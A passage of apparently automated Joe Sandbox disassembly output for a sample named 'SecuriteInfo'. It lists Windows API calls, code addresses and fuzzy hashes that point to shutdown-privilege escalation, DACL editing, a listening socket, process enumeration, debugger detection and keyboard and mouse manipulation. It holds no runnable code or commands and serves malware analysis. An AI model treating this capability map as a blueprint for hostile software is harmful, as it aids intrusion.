                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                        • String ID: %.3d
                                                                        • API String ID: 3337348382-986655627
                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 2640511053-438819550
                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2938487562-3733053543
                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                        APIs
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                        • String ID:
                                                                        • API String ID: 1255039815-0
                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                        • String ID:
                                                                        • API String ID: 1158019794-0
                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_strncmp
                                                                        • String ID: @oH$\$^$h
                                                                        • API String ID: 2175499884-3701065813
                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                        • closesocket.WSOCK32(00000000), ref: 00465377
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                        • closesocket.WSOCK32(00000000), ref: 004653BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                        • String ID:
                                                                        • API String ID: 540024437-0
                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                        • API String ID: 0-2872873767
                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2547909840-0
                                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                        • String ID: *.*$\VH
                                                                        • API String ID: 2786137511-2657498754
                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID: pqI
                                                                        • API String ID: 2579439406-2459173057
                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                        APIs
                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicollmouse_event
                                                                        • String ID: DOWN
                                                                        • API String ID: 1033544147-711622031
                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
